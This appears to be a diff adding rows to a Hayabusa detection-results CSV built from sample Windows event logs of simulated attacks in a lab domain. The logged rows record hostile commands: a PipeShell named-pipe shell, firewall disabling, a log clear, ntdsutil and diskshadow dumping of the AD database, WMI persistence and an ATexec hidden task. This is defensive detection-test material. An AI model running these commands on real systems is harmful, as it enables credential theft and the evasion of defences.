+2021-06-03 22:05:40.098 +09:00,jump01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID800-4103-Interactive PipeShell over named pipe (server and client).evtx
+2021-06-03 22:05:59.812 +09:00,fs01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(PSConsoleHostReadline): ""PSConsoleHostReadline""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID800-4103-Interactive PipeShell over named pipe (server and client).evtx
+2021-06-03 22:06:06.124 +09:00,jump01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(PSConsoleHostReadline): ""PSConsoleHostReadline""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID800-4103-Interactive PipeShell over named pipe (server and client).evtx
+2021-06-03 22:06:06.125 +09:00,jump01.offsec.lan,4104,info,,PwSh Scriptblock Log,Invoke-PipeShell -mode client -server localhost -aeskey aaaabbbbccccdddd -pipe eventlog_svc -i -timeout 1000,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID800-4103-Interactive PipeShell over named pipe (server and client).evtx
+2021-06-03 22:06:06.151 +09:00,jump01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(New-Object): ""New-Object"" ParameterBinding(New-Object): name=""TypeName""; value=""System.IO.Pipes.NamedPipeClientStream"" ParameterBinding(New-Object): name=""ArgumentList""; value=""localhost, eventlog_svc, InOut, None, Impersonation""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID800-4103-Interactive PipeShell over named pipe (server and client).evtx
+2021-06-03 22:06:06.161 +09:00,jump01.offsec.lan,4104,info,,PwSh Scriptblock Log,"] Waiting for client..`n"" $PipeObject.WaitForConnection() } else { try { # Add a 1s time-out in case the server is not live $PipeObject.Connect($timeout) } catch { echo ""[!] Server pipe not available!"" Return } } $PipeReader = $PipeWriter = $null $PipeReader = new-object System.IO.StreamReader($PipeObject) $PipeWriter = new-object System.IO.StreamWriter($PipeObject) $PipeWriter.AutoFlush = $true Initialize-Session }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID800-4103-Interactive PipeShell over named pipe (server and client).evtx
+2021-06-03 22:06:07.154 +09:00,jump01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Output): ""Write-Output"" ParameterBinding(Write-Output): name=""InputObject""; value=""[!] Server pipe not available!""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID800-4103-Interactive PipeShell over named pipe (server and client).evtx
+2021-06-03 22:06:07.154 +09:00,jump01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Out-Default): ""Out-Default"" ParameterBinding(Out-Default): name=""InputObject""; value=""+----------------------------------- | Host Name : JUMP01 | Named Pipe : eventlog_svc | AES Key : aaaabbbbccccdddd | Timeout : 1000 +-----------------------------------"" ParameterBinding(Out-Default): name=""InputObject""; value=""[!] Server pipe not available!""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID800-4103-Interactive PipeShell over named pipe (server and client).evtx
+2021-06-03 22:06:07.156 +09:00,jump01.offsec.lan,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID800-4103-Interactive PipeShell over named pipe (server and client).evtx
+2021-06-03 22:06:07.157 +09:00,jump01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID800-4103-Interactive PipeShell over named pipe (server and client).evtx
+2021-06-03 22:06:27.069 +09:00,jump01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(PSConsoleHostReadline): ""PSConsoleHostReadline""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID800-4103-Interactive PipeShell over named pipe (server and client).evtx
+2021-06-03 22:06:27.070 +09:00,jump01.offsec.lan,4104,info,,PwSh Scriptblock Log,Invoke-PipeShell -mode client -server localhost -aeskey aaaabbbbccccdddd -pipe eventlog_svc -timeout 1000 -c ls,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID800-4103-Interactive PipeShell over named pipe (server and client).evtx
+2021-06-03 22:06:27.073 +09:00,jump01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(New-Object): ""New-Object"" ParameterBinding(New-Object): name=""TypeName""; value=""System.IO.Pipes.NamedPipeClientStream"" ParameterBinding(New-Object): name=""ArgumentList""; value=""localhost, eventlog_svc, InOut, None, Impersonation""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID800-4103-Interactive PipeShell over named pipe (server and client).evtx
+2021-06-03 22:06:28.071 +09:00,jump01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Output): ""Write-Output"" ParameterBinding(Write-Output): name=""InputObject""; value=""[!] Server pipe not available!""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID800-4103-Interactive PipeShell over named pipe (server and client).evtx
+2021-06-03 22:06:28.072 +09:00,jump01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Out-Default): ""Out-Default"" ParameterBinding(Out-Default): name=""InputObject""; value=""+----------------------------------- | Host Name : JUMP01 | Named Pipe : eventlog_svc | AES Key : aaaabbbbccccdddd | Timeout : 1000 +-----------------------------------"" ParameterBinding(Out-Default): name=""InputObject""; value=""[!] Server pipe not available!""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID800-4103-Interactive PipeShell over named pipe (server and client).evtx
+2021-06-04 02:42:33.379 +09:00,fs01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Resolve-Path): ""Resolve-Path"" ParameterBinding(Resolve-Path): name=""ErrorAction""; value=""Ignore"" ParameterBinding(Resolve-Path): name=""WarningAction""; value=""Ignore"" ParameterBinding(Resolve-Path): name=""InformationAction""; value=""Ignore"" ParameterBinding(Resolve-Path): name=""Verbose""; value=""False"" ParameterBinding(Resolve-Path): name=""Debug""; value=""False"" ParameterBinding(Resolve-Path): name=""Path""; value=""Net*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID800-4103-4104-Print spooler privilege escalation (CVE-2020-1048).evtx
+2021-06-04 02:42:35.914 +09:00,fs01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(PSConsoleHostReadline): ""PSConsoleHostReadline""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID800-4103-4104-Print spooler privilege escalation (CVE-2020-1048).evtx
+2021-06-04 02:42:35.915 +09:00,fs01.offsec.lan,4104,info,,PwSh Scriptblock Log,Add-PrinterPort -Name .\NetshHelperBeacon.dll,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID800-4103-4104-Print spooler privilege escalation (CVE-2020-1048).evtx
+2021-06-04 02:42:35.939 +09:00,fs01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Add-PrinterPort): ""Add-PrinterPort"" ParameterBinding(Add-PrinterPort): name=""Name""; value="".\NetshHelperBeacon.dll"" ParameterBinding(Add-PrinterPort): name=""ComputerName""; value="""" ParameterBinding(Add-PrinterPort): name=""HostName""; value="""" ParameterBinding(Add-PrinterPort): name=""PrinterName""; value="""" ParameterBinding(Add-PrinterPort): name=""PrinterHostAddress""; value="""" ParameterBinding(Add-PrinterPort): name=""PortNumber""; value=""0"" ParameterBinding(Add-PrinterPort): name=""SNMP""; value=""0"" ParameterBinding(Add-PrinterPort): name=""SNMPCommunity""; value="""" ParameterBinding(Add-PrinterPort): name=""LprHostAddress""; value="""" ParameterBinding(Add-PrinterPort): name=""LprQueueName""; value="""" ParameterBinding(Add-PrinterPort): name=""LprByteCounting""; value=""False"" ParameterBinding(Add-PrinterPort): name=""ThrottleLimit""; value=""0"" ParameterBinding(Add-PrinterPort): name=""AsJob""; value=""False""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID800-4103-4104-Print spooler privilege escalation (CVE-2020-1048).evtx
+2021-06-04 02:42:35.939 +09:00,fs01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Out-Default): ""Out-Default""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID800-4103-4104-Print spooler privilege escalation (CVE-2020-1048).evtx
+2021-06-04 03:34:12.671 +09:00,fs01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(PSConsoleHostReadline): ""PSConsoleHostReadline""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID800-4103-Firewall disabled.evtx
+2021-06-04 03:34:12.672 +09:00,fs01.offsec.lan,4104,info,,PwSh Scriptblock Log,"Set-NetFirewallProfile -Profile Domain, Public, Private -Enabled False",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID800-4103-Firewall disabled.evtx
+2021-06-04 03:34:12.672 +09:00,fs01.offsec.lan,4104,high,Evas,Windows Firewall Profile Disabled,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_windows_firewall_profile_disabled.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID800-4103-Firewall disabled.evtx
+2021-06-04 03:34:12.887 +09:00,fs01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-NetFirewallProfile): ""Set-NetFirewallProfile"" ParameterBinding(Set-NetFirewallProfile): name=""Name""; value=""Domain, Public, Private"" ParameterBinding(Set-NetFirewallProfile): name=""Enabled""; value=""False"" ParameterBinding(Set-NetFirewallProfile): name=""All""; value=""False"" ParameterBinding(Set-NetFirewallProfile): name=""PolicyStore""; value="""" ParameterBinding(Set-NetFirewallProfile): name=""GPOSession""; value="""" ParameterBinding(Set-NetFirewallProfile): name=""LogFileName""; value="""" ParameterBinding(Set-NetFirewallProfile): name=""LogMaxSizeKilobytes""; value=""0"" ParameterBinding(Set-NetFirewallProfile): name=""ThrottleLimit""; value=""0"" ParameterBinding(Set-NetFirewallProfile): name=""AsJob""; value=""False"" ParameterBinding(Set-NetFirewallProfile): name=""PassThru""; value=""False""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID800-4103-Firewall disabled.evtx
+2021-06-04 03:34:12.888 +09:00,fs01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Out-Default): ""Out-Default""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID800-4103-Firewall disabled.evtx
+2021-06-04 03:34:12.889 +09:00,fs01.offsec.lan,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID800-4103-Firewall disabled.evtx
+2021-06-04 03:34:12.895 +09:00,fs01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID800-4103-Firewall disabled.evtx
+2021-06-04 04:17:44.873 +09:00,fs01.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4688-5447-4950-Firewall disabled (command).evtx
+2021-06-04 04:17:46.489 +09:00,fs01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: netsh a s p state off | Path: C:\Windows\System32\netsh.exe | PID: 0xfa8 | User: admmig | LID: 0x46b7b4,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4688-5447-4950-Firewall disabled (command).evtx
+2021-06-04 04:17:46.577 +09:00,fs01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: netsh advfirewall set privateprofile state off | Path: C:\Windows\System32\netsh.exe | PID: 0x10fc | User: admmig | LID: 0x46b7b4,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4688-5447-4950-Firewall disabled (command).evtx
+2021-06-04 04:17:46.666 +09:00,fs01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: netsh f s o d | Path: C:\Windows\System32\netsh.exe | PID: 0x1598 | User: admmig | LID: 0x46b7b4,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4688-5447-4950-Firewall disabled (command).evtx
+2021-06-04 04:17:47.699 +09:00,fs01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: netsh firewall set opmode disable | Path: C:\Windows\System32\netsh.exe | PID: 0x1504 | User: admmig | LID: 0x46b7b4,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4688-5447-4950-Firewall disabled (command).evtx
+2021-06-04 04:39:52.893 +09:00,fs01.offsec.lan,2003,low,,Setting Change in Windows Firewall with Advanced Security,,../hayabusa-rules/sigma/builtin/firewall_as/win_firewall_as_setting_change.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID2003-4950-Firewall disabled.evtx
+2021-06-04 04:39:52.895 +09:00,fs01.offsec.lan,2003,low,,Setting Change in Windows Firewall with Advanced Security,,../hayabusa-rules/sigma/builtin/firewall_as/win_firewall_as_setting_change.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID2003-4950-Firewall disabled.evtx
+2021-06-04 04:39:53.056 +09:00,fs01.offsec.lan,2003,low,,Setting Change in Windows Firewall with Advanced Security,,../hayabusa-rules/sigma/builtin/firewall_as/win_firewall_as_setting_change.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID2003-4950-Firewall disabled.evtx
+2021-06-04 17:41:47.982 +09:00,exchange01.offsec.lan,6,high,Persis,Failed MSExchange Transport Agent Installation,,../hayabusa-rules/sigma/builtin/msexchange/win_exchange_transportagent_failed.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1505-Server Software Component/ID6-Failed to install an Exchange transport agent.evtx
+2021-06-04 17:41:48.041 +09:00,exchange01.offsec.lan,6,high,Persis,Failed MSExchange Transport Agent Installation,,../hayabusa-rules/sigma/builtin/msexchange/win_exchange_transportagent_failed.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1505-Server Software Component/ID6-Failed to install an Exchange transport agent.evtx
+2021-06-04 18:30:48.170 +09:00,exchange01.offsec.lan,11,info,,File Created,Path: E:\Exchange2016\TransportRoles\Shared\agents.config | Process: C:\Program Files (x86)\Notepad++\notepad++.exe | PID: 19108 | PGUID: 6D3C60FE-F13D-60B9-22E2-010000001D00,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1505-Server Software Component/ID11-Exchange transport config modified.evtx
+2021-06-06 04:35:16.721 +09:00,rootdc1.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: ntdsutil.exe 'ac i ntds' 'ifm' 'create full c:\hacker' q q | Path: C:\Windows\System32\ntdsutil.exe | PID: 0x724 | User: admmig | LID: 0xa8a1627a,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-IFM created.evtx
+2021-06-06 04:36:32.683 +09:00,rootdc1.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ntdsutil ""activate instance ntds"" ifm ""create full c:\hacker"" quit quit | Path: C:\Windows\System32\ntdsutil.exe | PID: 0x1bec | User: admmig | LID: 0xa8a1627a",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-IFM created.evtx
+2021-06-06 05:17:05.433 +09:00,rootdc1.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: diskshadow.exe /s shadow.txt | Path: C:\Windows\System32\diskshadow.exe | PID: 0xda8 | User: admmig | LID: 0xa8a1627a,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-Diskshadow abuse.evtx
+2021-06-10 04:29:58.239 +09:00,fs01.offsec.lan,20,medium,,WMI Event Consumer Activity,"technique_id=T1047,technique_name=Windows Management Instrumentation | Created | Type: Command Line | Name: ""Evil"" | Dst: ""cmd.exe /c echo %ProcessId% >> c:\\\\temp\\\\log.txt"" | User: OFFSEC\admmig",../hayabusa-rules/hayabusa/sysmon/alerts/20_WmiEventConsumerActivity_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID19-20-WMI registration via PowerLurk.evtx
+2021-06-10 04:29:58.240 +09:00,fs01.offsec.lan,19,medium,,WMI Event Filter Activity_Sysmon Alert,"technique_id=T1047,technique_name=Windows Management Instrumentation | Created | Namespace: ""root/cimv2"" | Name: ""Evil"" | Query: ""SELECT * FROM Win32_ProcessStartTrace WHERE ProcessName='notepad.exe'"" | User: OFFSEC\admmig",../hayabusa-rules/hayabusa/sysmon/alerts/19_WmiEventFilterActivity_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID19-20-WMI registration via PowerLurk.evtx
+2021-06-10 04:29:58.392 +09:00,fs01.offsec.lan,19,medium,,WMI Event Filter Activity_Sysmon Alert,"technique_id=T1047,technique_name=Windows Management Instrumentation | Created | Namespace: ""root/cimv2"" | Name: ""Evil"" | Query: ""SELECT * FROM Win32_ProcessStartTrace WHERE ProcessName='notepad.exe'"" | User: OFFSEC\admmig",../hayabusa-rules/hayabusa/sysmon/alerts/19_WmiEventFilterActivity_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID19-20-WMI registration via PowerLurk.evtx
+2021-06-10 23:12:46.042 +09:00,fs01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(PSConsoleHostReadline): ""PSConsoleHostReadline""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID800-4103-4104-WMI registration via PowerLurk.evtx
+2021-06-10 23:12:46.058 +09:00,fs01.offsec.lan,4104,info,,PwSh Scriptblock Log,"c:\\temp\\log.txt"" -Trigger ProcessStart -ProcessName notepad.exe",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID800-4103-4104-WMI registration via PowerLurk.evtx
+2021-06-10 23:12:46.157 +09:00,fs01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-WmiInstance): ""Set-WmiInstance"" ParameterBinding(Set-WmiInstance): name=""Namespace""; value=""root/subscription"" ParameterBinding(Set-WmiInstance): name=""Class""; value=""CommandLineEventConsumer"" ParameterBinding(Set-WmiInstance): name=""Arguments""; value=""System.Collections.Hashtable""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID800-4103-4104-WMI registration via PowerLurk.evtx
+2021-06-10 23:12:46.177 +09:00,fs01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-WmiInstance): ""Set-WmiInstance"" ParameterBinding(Set-WmiInstance): name=""Namespace""; value=""root/subscription"" ParameterBinding(Set-WmiInstance): name=""Class""; value=""__EventFilter"" ParameterBinding(Set-WmiInstance): name=""Arguments""; value=""System.Collections.Hashtable""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID800-4103-4104-WMI registration via PowerLurk.evtx
+2021-06-11 06:21:20.636 +09:00,fs01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x5a4175e,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,4698,4699,5145,4624-ATexec remote trask creation (GLOBAL).evtx"
+2021-06-11 06:21:26.357 +09:00,fs01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.123.11 | LID: 0x5a41984,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,4698,4699,5145,4624-ATexec remote trask creation (GLOBAL).evtx"
+2021-06-11 06:21:26.357 +09:00,fs01.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,../hayabusa-rules/sigma/builtin/security/win_pass_the_hash_2.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,4698,4699,5145,4624-ATexec remote trask creation (GLOBAL).evtx"
+2021-06-11 06:21:26.383 +09:00,fs01.offsec.lan,4698,info,,Task Created,"Name: \bouWFQYO | Content: <?xml version=""1.0"" encoding=""UTF-16""?> <Task version=""1.2"" xmlns=""http://schemas.microsoft.com/windows/2004/02/mit/task""> <Triggers> <CalendarTrigger> <StartBoundary>2015-07-15T20:35:13.2757294</StartBoundary> <Enabled>true</Enabled> <ScheduleByDay> <DaysInterval>1</DaysInterval> </ScheduleByDay> </CalendarTrigger> </Triggers> <Principals> <Principal id=""LocalSystem""> <UserId>S-1-5-18</UserId> <RunLevel>HighestAvailable</RunLevel> <LogonType>InteractiveToken</LogonType> </Principal> </Principals> <Settings> <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy> <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries> <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries> <AllowHardTerminate>true</AllowHardTerminate> <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable> <IdleSettings> <StopOnIdleEnd>true</StopOnIdleEnd> <RestartOnIdle>false</RestartOnIdle> </IdleSettings> <AllowStartOnDemand>true</AllowStartOnDemand> <Enabled>true</Enabled> <Hidden>true</Hidden> <RunOnlyIfIdle>false</RunOnlyIfIdle> <WakeToRun>false</WakeToRun> <ExecutionTimeLimit>P3D</ExecutionTimeLimit> <Priority>7</Priority> </Settings> <Actions Context=""LocalSystem""> <Exec> <Command>cmd.exe</Command> <Arguments>/C whoami &gt; %windir%\Temp\bouWFQYO.tmp 2&gt;&amp;1</Arguments> </Exec> </Actions> <RegistrationInfo> <URI>\bouWFQYO</URI> </RegistrationInfo> </Task> | User: admmig | LID: 0x5a419bc",../hayabusa-rules/hayabusa/non-default/events/Security/ScheduledTasks/4698_ScheduledTaskCreated.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1053.005-Scheduled Task/ID4698-4699-Fast created & deleted task by ATexec (susp. arg.).evtx
